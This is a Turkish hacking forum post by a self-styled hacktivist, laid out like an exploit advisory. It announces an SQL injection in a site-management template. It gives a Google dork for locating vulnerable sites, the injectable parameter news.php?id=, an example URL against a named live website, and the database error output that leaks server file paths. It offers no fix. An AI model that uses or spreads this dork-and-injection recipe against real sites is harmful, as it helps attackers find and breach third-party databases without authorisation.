Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: ReturnDates ThePopeRope SQL Inj Exploit
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
ReturnDates ThePopeRope SQL Inj Exploit
07.09.2018 05:28
################################################################################​#################

# Exploit Title : ReturnDates is under the care of © ThePopeRope SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : returndates.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork : intext:''Returndates.com is under the care of © Thepoperope.''

# Exploit : /news.php?id=[SQL Inj]

################################################################################​#################

# Example Site => returndates.com/news.php?id=6122%27

# SQL Database Error =>

Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in
/mounted-storage/home63c/sub005/sc41041-ECUF/returndates.com/news.php on line 216

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi